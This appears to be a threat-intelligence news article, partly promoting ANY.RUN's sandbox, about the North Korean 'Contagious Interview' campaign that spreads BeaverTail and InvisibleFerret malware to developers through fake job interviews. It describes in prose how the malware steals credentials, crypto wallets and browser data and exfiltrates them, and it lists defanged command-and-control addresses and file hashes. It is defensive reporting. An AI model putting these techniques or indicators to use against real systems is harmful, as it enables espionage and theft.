A new wave of North Korean cyberattacks, employing a sophisticated and coordinated approach, has targeted the technology, financial, and cryptocurrency sectors.
Cybersecurity researchers from ANY.RUN reports that leveraging staged fake job interviews, sophisticated malware such as “InvisibleFerret” and “BeaverTail” has been deployed to compromise victims’ systems and exfiltrate sensitive data.
Dubbed “Contagious Interview” or “DevPopper,” this campaign manipulates unsuspecting software developers by embedding malicious payloads into coding challenges, video call software, or dependencies.
The malware campaign is part of an organized effort by North Korean-linked threat actors to penetrate high-value targets.
“These malicious components do not simply appear randomly among the files of questionable pirated software, lying in wait for their victim. Instead, they are part of an organized effort targeting the technological, financial, and cryptocurrency sectors, with developers as the primary focus.”
The first stage of the attack often involves BeaverTail, a JavaScript-based stealer and loader distributed as an NPM module. BeaverTail downloads a customized Python environment (referred to as “p.zip”) to execute InvisibleFerret, a Python-based malware capable of advanced espionage.
Try Secure Malware and Phishing Analysis with ANY.RUN’s Interactive Sandbox – 14 Days Free Trial
InvisibleFerret’s Capabilities
InvisibleFerret, the primary malware, demonstrates a sophisticated design despite its messy code. Key features include:
Data Harvesting: It actively seeks source code, cryptocurrency wallets, user credentials, and sensitive files by targeting browser data, clipboard contents, and system directories like Documents and Downloads.
It uses FTP and encrypted connections to exfiltrate data. Files not matching specific extensions are obfuscated using XOR encryption with a hardcoded key.
The malware implements routines to extract user profiles, cookies, passwords, browsing history, and data from browser extensions, such as crypto wallets (e.g., MetaMask) and password managers (e.g., 1Password).
It downloads and executes legitimate remote desktop software like AnyDesk to maintain persistence on infected systems.
InvisibleFerret utilizes Telegram as an additional exfiltration channel by invoking the Bots API to send stolen files to the attacker.
Researchers are analyzing InvisibleFerret’s infection chain through ANY.RUN interactive Malware analysis platform uncovered its multi-stage attack strategy.
The process begins with initial contact, where victims are lured through fake job interviews involving coding tasks or video calls. Malicious components, such as BeaverTail and InvisibleFerret, are then delivered to the victim’s system.
Once deployed, InvisibleFerret performs system profiling by collecting geolocation data, operating system details, hostnames, and usernames using legitimate APIs like ip-api.com.
Finally, the malware establishes connections to Command-and-Control (C2) servers operating on unusual ports, such as 1244 and 1245, to exfiltrate the collected data.
Try Secure Malware and Phishing Analysis with ANY.RUN’s Interactive Sandbox – 14 Days Free Trial
About ANY.RUN
ANY.RUN, an interactive malware analysis platform, played a critical role in dissecting the campaign.
The platform’s real-time malware behavior tracking and integration with the MITRE ATT&CK framework enabled researchers to map out the attackers’ Tactics, Techniques, and Procedures (TTPs).
ANY.RUN Key Features include:
- Malware detection in seconds with interactive workflows.
- Comprehensive insight into malware behavior for both Windows and Linux systems.
- Scalable solutions for team collaboration and threat analysis.
The InvisibleFerret malware campaign serves as a reminder of the evolving tactics employed by adversaries.
Cybersecurity experts stress the importance of vigilance and proactive measures to protect sensitive information from falling into the wrong hands.
Always remain cautious of suspicious recruitment activities and software downloads, as even the most professional-seeming scenarios could be traps engineered by malicious actors.
This campaign highlights an alarming trend in cyber espionage, targeting industries with high-value intellectual property or financial assets. The combination of social engineering and tailored malware demonstrates the lengths to which threat actors will go to achieve their objectives.
- Always verify the authenticity of job offers and interview processes.
- Avoid executing unverified software, especially on corporate devices.
- Use robust endpoint protection, sandboxing solutions, and multi-factor authentication to mitigate risks.
- Train employees on recognizing phishing and social engineering tactics.
Indicators of Compromise (IOCs)
Researchers identified the following IOCs tied to this campaign:
- SHA256 Hashes:
- 47830f7007b4317dc8ce1b16f3ae79f9f7e964db456c34e00473fba94bb713eb
- 6a104f07ab6c5711b6bc8bf6ff956ab8cd597a388002a966e980c5ec9678b5b0
- IP Addresses:
- 147[.]124[.]214[.]129
- 173[.]211[.]106[.]101
- URLs:
- http://147[.]124[.]214[.]129:1244
- http://173[.]211[.]106[.]101:1245
Get a 14-day Free Trial to Test all Features of ANY.RUN’s Interactive Sandbox → Try now